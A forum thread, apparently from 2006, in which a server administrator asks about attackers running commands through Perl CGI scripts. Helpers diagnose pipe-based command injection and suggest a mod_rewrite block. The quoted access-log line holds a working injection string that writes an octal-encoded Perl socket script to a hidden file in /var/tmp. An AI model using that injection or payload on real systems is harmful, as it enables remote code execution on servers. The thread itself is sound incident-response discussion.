Perl being hacked

Hello,

I'm having a problem with one customer's server someone found a way to make perl run scripts on that server and I do not know if that's a perl bug or if there is something I can disable to make it stop... here is the line from the log file

65.7.178.227 - - [15/Apr/2006:03:33:53 -0400] "GET /cgi-bin/master.cgi?page=|perl%20-e%20%22print%20%5C%22%5C043%5C041%5C057%5C165%5C163%5C162%5C057%5C142%5C151%5C156%5C057%5C160%5C145%5C162%5C154%5C012%5C165%5C163%5C145%5C040%5C123%5C157%5C143%5C153%5C145%5C164%5C073%5C040%5C165%5C163%5C145%5C040%5C111%5C117%5C072%5C072%5C110%5C141%5C156%5C144%5C154%5C145%5C073%5C040%5C165%5C163%5C145%5C040%5C120%5C117%5C123%5C111%5C130%5C073%5C040%5C044%5C160%5C162%5C157%5C164%5C157%5C040%5C075%5C040%5C147%5C145%5C164%5C160%5C162%5C157%5C164%5C157%5C142%5C171%5C156%5C141%5C155%5C145%5C050%5C047%5C164%5C143%5C160%5C047%5C051%5C073%5C%22%22%20%3E/var/tmp/.mixed.2006| HTTP/1.1" 200 5

the file .mixed.2006 was there when I looked

Thank you in advance
adcentrixAsked:
Who is Participating?

[Product update] Infrastructure Analysis Tool is now available with Business Accounts.Learn More

x
I wear a lot of hats...

"The solutions and answers provided on Experts Exchange have been extremely helpful to me over the last few years. I wear a lot of hats - Developer, Database Administrator, Help Desk, etc., so I know a lot of things but not a lot about one thing. Experts Exchange gives me answers from people who do know a lot about one thing, in a easy to use platform." -Todd S.

m1tk4Commented:
This is a vulnerability in "master.cgi" - Perl by itself has nothing to do with it. Apparently, master.cgi does not do necessary checks for the safety of passed parameters and a request like this one makes it do something it's not supposed to do.

To make it stop you need to either disable or fix "master.cgi", your Perl is fine.

Unfortunately, I can't help you more without knowing what that master.cgi does.
pjedmondCommented:
This vulnerability could have been around for ages!:

http://seclists.org/lists/vuln-dev/2001/Jun/0006.html

June 2001?

It looks as if it is part of a link exchange system:

http://www.scriptgateway.com/scripts/cgiandperl/link_checking/s307492-link_master_v4_0.html

that is no longer supported.

Solution - get rid of the master.cgi script!

HTH:)
adcentrixAuthor Commented:
Thanks for the response, but this is happening with all the scripts on the server, it's not just this one... It's part of an ecommerce software that we developed under perl... It's running in other server without a problem...

I looked in the log and the inspostor is able to run any command that the user NOBODY is able to run if connected to the console... just by adding a pipe | at the end of the script and after that the command that is supposed to be run by the server...

Thanks
Cloud as a Security Delivery Platform for MSSPs

Every Managed Security Service Provider (MSSP) needs a platform to deliver effective and efficient security-as-a-service to their customers. Scale, elasticity and profitability are a few of the many features that a Cloud platform offers. View our on-demand webinar to learn more!

adcentrixAuthor Commented:
Is there sometype of command or instruction that I should add to the script to make it more secure? I only have the perl location line and after that I start with my own code? is that correct or it should have something else?
adcentrixAuthor Commented:
Maybe there is a way to ignore anything after a pipe | that is sent on the URL? Anyone knows anything about that?
m1tk4Commented:
>> Is there sometype of command or instruction that I should add to the script to make it more secure? I only have the perl location line and after that I start with my own code? is that correct or it should have something else?

I don't quite understand what you mean by "perl location line".

Your vulnerability is in your ecommerce software code, and it is similar to this one: http://www.kb.cert.org/vuls/id/496064, http://sans.org/resources/malwarefaq/guestbook.php (they provide ways to fix it too). If it happens to all your scripts on the server, they all have the same problem. Even if you did something on the other server to protect yourself from this (and you can do it by doing a url rewrite detecting presense of | characters in the request) your real problem is your code in the ecommerce suite you are talking about, and you still need to fix it.
m1tk4Commented:
>>Maybe there is a way to ignore anything after a pipe | that is sent on the URL? Anyone knows anything about that?

If it's Apache, you can use mod_rewrite to detect and block that - see http://httpd.apache.org/docs/2.0/misc/rewriteguide.html
adcentrixAuthor Commented:
It's an apache version 1.3.33 and the script has the open function on it...

That's nice but do you know how to use this command? and where should I add the command on the httpd.conf?

is this correct?
RedirectMatch ^|$ http://www.google.com/

Thank you very much for your help...
 

m1tk4Commented:
No, something like this:

RewriteRule (.*)\|(.*) / [forbidden]

| is a special character in regexp and needs to be escaped.
m1tk4Commented:
You can add it pretty much anywhere, .htaccess, <VirtualHost> container, <Directory> - it all depends on how your web server configuration is structured. Don't forget to add RewriteEngine on before it. See http://httpd.apache.org/docs/2.0/mod/mod_rewrite.html#rewriterule for detailed info on all rewrites.
adcentrixAuthor Commented:
I tried to add to the .htaccess and the <directory> but it does not affect the problem... it still accepts the command and does not forward to the forbiden page

Any suggestion?
m1tk4Commented:
RewriteRule (.*)\|(.*) / [forbidden,qsappend]

Sorry, missed that one. Before you try it try just requesting simething like /blabla|.htm to see if you placed it in the right container.

By default RewriteRule doesn't parse the query strings.

Again, you still should fix your software, because mod_rewrite only lets you control GET requests, but POST requests may still circumvent this.

Experts Exchange Solution brought to you by

Your issues matter to us.

Facing a tech roadblock? Get the help and guidance you need from experienced professionals who care. Ask your question anytime, anywhere, with no hassle.

Start your 7-day free trial
adcentrixAuthor Commented:
Thank you very much m1tk4
It worked, I also fixed the problem on our software...

Have a nice weeked...
It's more than this solution.Get answers and train to solve all your tech problems - anytime, anywhere.Try it for free Edge Out The Competitionfor your dream job with proven skills and certifications.Get started today Stand Outas the employee with proven skills.Start learning today for free Move Your Career Forwardwith certification training in the latest technologies.Start your trial today
Linux Security

From novice to tech pro — start learning today.